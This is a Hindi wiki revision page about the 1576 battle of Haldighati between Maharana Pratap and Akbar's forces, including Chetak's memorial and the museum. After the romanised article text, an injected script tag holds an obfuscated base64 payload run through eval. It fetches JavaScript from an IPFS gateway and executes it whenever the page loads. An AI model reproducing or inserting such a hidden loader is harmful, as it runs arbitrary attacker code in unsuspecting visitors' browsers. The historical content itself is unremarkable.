Difference between revisions of "हल्दीघाटी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
Line 4: Line 4:
 
'''युद्ध राणा प्रताप के पक्ष में निर्णायक न हो सका।''' खुला युद्ध समाप्त हो गया था किंतु संघर्ष समाप्त नहीं हुआ था। भविष्य में संघर्षो को अंजाम देने के लिए, प्रताप एवं उसकी सेना युद्धस्थल से हटकर पहाड़ी प्रदेश मे आ गयी थी।  [[अकबर]] की आधीनता स्वीकार न किए जाने के कारण प्रताप के साहस एवं शौर्य की गाथाएँ तब तक गुंजित रहेंगी जब तक युद्धों का वर्णन किया जाता रहेगा। युद्ध के दौरान प्रताप का स्वामिभक्त घोड़ा चेतक घायल हो गया था। फिर भी, उसने अपने स्वामी की रक्षा की। अंत में चेतक वीरगति को प्राप्त हुआ। युद्धस्थली के समीप ही चेतक की स्मृति में स्मारक बना हुआ है। अब यहाँ पर एक संग्रहालय है। इस संग्रहालय में हल्‍दीघाटी के युद्ध के मैदान का एक मॉडल रखा गया है। इसके अलावा यहाँ महाराणा प्रताप से संबंधित वस्‍तुओं को रखा गया है।  
 
'''युद्ध राणा प्रताप के पक्ष में निर्णायक न हो सका।''' खुला युद्ध समाप्त हो गया था किंतु संघर्ष समाप्त नहीं हुआ था। भविष्य में संघर्षो को अंजाम देने के लिए, प्रताप एवं उसकी सेना युद्धस्थल से हटकर पहाड़ी प्रदेश मे आ गयी थी।  [[अकबर]] की आधीनता स्वीकार न किए जाने के कारण प्रताप के साहस एवं शौर्य की गाथाएँ तब तक गुंजित रहेंगी जब तक युद्धों का वर्णन किया जाता रहेगा। युद्ध के दौरान प्रताप का स्वामिभक्त घोड़ा चेतक घायल हो गया था। फिर भी, उसने अपने स्वामी की रक्षा की। अंत में चेतक वीरगति को प्राप्त हुआ। युद्धस्थली के समीप ही चेतक की स्मृति में स्मारक बना हुआ है। अब यहाँ पर एक संग्रहालय है। इस संग्रहालय में हल्‍दीघाटी के युद्ध के मैदान का एक मॉडल रखा गया है। इसके अलावा यहाँ महाराणा प्रताप से संबंधित वस्‍तुओं को रखा गया है।  
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 13:58, 10 January 2011

[[chitr:Haldighati-Udaipur.jpg|thumb|250px|halh‍dighati, udayapur
Haldighati, Udaipur]] rajasthan ke udayapur jile se 27 mil uttar-pashchim evan nathadvar se 7 mil pashchim mean itihas prasiddh ranasthali haldighati hai. yahian samrat akabar ki mugal sena evan maharana pratap tatha unaki rajapoot sena mean 18 joon, 1576 ko bhishan yuddh hua. is yuddh mean pratap ke sath kee rajapoot yoddhaoan sahit hakim khaan soor bhi upasthit tha. is yuddh mean rana pratap ka sath sthaniy bhiloan ne diya, jo is yuddh ki mukhy bat thi mugaloan ki or se manasianh sena ka netritv kar raha tha.

yuddh rana pratap ke paksh mean nirnayak n ho saka. khula yuddh samapt ho gaya tha kiantu sangharsh samapt nahian hua tha. bhavishy mean sangharsho ko aanjam dene ke lie, pratap evan usaki sena yuddhasthal se hatakar paha di pradesh me a gayi thi. akabar ki adhinata svikar n kie jane ke karan pratap ke sahas evan shaury ki gathaean tab tak guanjit raheangi jab tak yuddhoan ka varnan kiya jata rahega. yuddh ke dauran pratap ka svamibhakt gho da chetak ghayal ho gaya tha. phir bhi, usane apane svami ki raksha ki. aant mean chetak viragati ko prapt hua. yuddhasthali ke samip hi chetak ki smriti mean smarak bana hua hai. ab yahaan par ek sangrahalay hai. is sangrahalay mean halh‍dighati ke yuddh ke maidan ka ek m aaudal rakha gaya hai. isake alava yahaan maharana pratap se sanbandhit vash‍tuoan ko rakha gaya hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh